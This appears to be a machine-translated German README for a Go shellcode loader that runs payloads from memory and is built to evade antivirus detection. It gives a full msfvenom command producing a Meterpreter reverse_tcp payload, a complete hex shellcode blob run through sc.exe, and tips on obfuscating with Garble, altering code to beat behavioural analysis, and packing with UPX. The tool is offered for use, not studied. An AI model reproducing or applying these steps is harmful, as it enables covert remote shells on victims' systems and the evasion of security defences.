Dies ist ein Programm zum Ausführen von ShellCode als eigener Prozess, alles aus dem Speicher. Dies wurde geschrieben, um die Anti-Virus-Erkennung zu besiegen. Dies wird jetzt als Virtool: Win32/Shrine.A erkannt. Verwenden Sie ein Werkzeug wie Garble, um die Binäre zu verschleiern, um die statische Analyse zu besiegen. Ändern Sie den Code selbst, um die Verhaltensanalyse zu besiegen.
Denken Sie daran, dass nur 64 -Bit -Shellcode in einem 64 -Bit -Prozess ausgeführt wird. Dies kann Ihre Shellcode -Architektur nicht autodieren.
Verwenden Sie MSFvenom oder Metasploit, um ein Stück Shellcode als Hex -Format zu erzeugen:
$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:windowstemp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
Manchmal ist der Shellcode größer als die Grenze einer Befehlszeile mit Argumenten. Versuchen Sie stattdessen das Ganze in ein Batch -Skript.
Standard -GO -Gebäudeschritte. Stellen Sie die Goos auf windows und Goarch auf das gleiche wie Ihr Shellcode, entweder 386 oder amd64 . Dies kann die Architektur Ihres Shellcode nicht erkennen.
Die resultierende Binärdatei ist etwas groß, 2,1 m, komprimiert sich aber gut mit UPX, ungefähr 508.000.